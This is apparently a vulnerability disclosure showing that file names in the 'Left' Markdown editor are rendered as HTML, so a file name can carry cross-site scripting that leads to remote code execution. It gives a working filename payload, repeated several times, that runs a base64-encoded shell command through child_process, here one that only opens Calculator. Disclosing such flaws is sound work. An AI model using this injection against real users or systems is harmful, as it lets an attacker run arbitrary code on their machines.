It has been possible to trigger xss and Remote Code Execution via filename
Description
You can trigger Remote Code Execution using require because the file name generates an XSS.
If you name the file <img src=x onerror=require('child_process').exec('echo$IFS"b3BlbiAtYSAvU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcA=="|base64$IFS-d|sh')>.md and open it with Left, the RCE will be triggered.
Summary
It has been possible to trigger xss and Remote Code Execution via filename
Description
You can trigger Remote Code Execution using require because the file name generates an XSS. If you name the file
<img src=x onerror=require('child_process').exec('echo$IFS"b3BlbiAtYSAvU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcA=="|base64$IFS-d|sh')>.mdand open it with Left, the RCE will be triggered.[macOS] filename
<img src=x onerror=require('child_process').exec('echo$IFS"b3BlbiAtYSAvU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcA=="|base64$IFS-d|sh')>.mdPoC
https://drive.google.com/file/d/1RgjPqX3rKthP2JlJEtQeqWpYKSi6tb16/view?usp=sharing
What’s More?